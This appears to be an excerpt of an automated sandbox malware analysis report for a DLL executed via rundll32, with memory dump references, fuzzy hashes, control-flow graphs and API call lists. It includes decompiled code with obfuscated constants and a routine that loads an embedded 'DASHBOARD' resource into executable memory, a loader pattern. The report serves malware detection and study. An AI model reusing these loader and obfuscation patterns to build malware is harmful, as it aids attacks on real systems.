                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 323fb5b1a5f7030883cdfc05723f59abec137e44b7013b40dd65927f7f30101c
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: D70144B6D0020CFFDB04DFE5D946A9DBBB0EB00304F508089E925AB290D7B81B50DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0043FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0042CF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E00422D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0043FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: f20573446d29a0c66b37199b630e45763a43f071123ae71b6b38bf2dd049977c
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: C6011376D00208BFDF05EFE5DD4A89EBBB1EB44304F10C098E9146A250DBB69B64DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(002A7A60), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(002A7A60), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 255 10001a83-10001a9e call 10001990 252->255 256 10001a1d-10001a2a 252->256 254 10001b0b-10001b0e 253->254 265 10001aa0-10001aa2 255->265 266 10001aa4-10001ac9 VirtualAlloc 255->266 257 10001a2c-10001a4e VirtualAlloc 256->257 258 10001a7e 256->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->254 261->258 265->254 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->254 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.514799186.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514890830.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514913240.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514940007.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.514981615.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%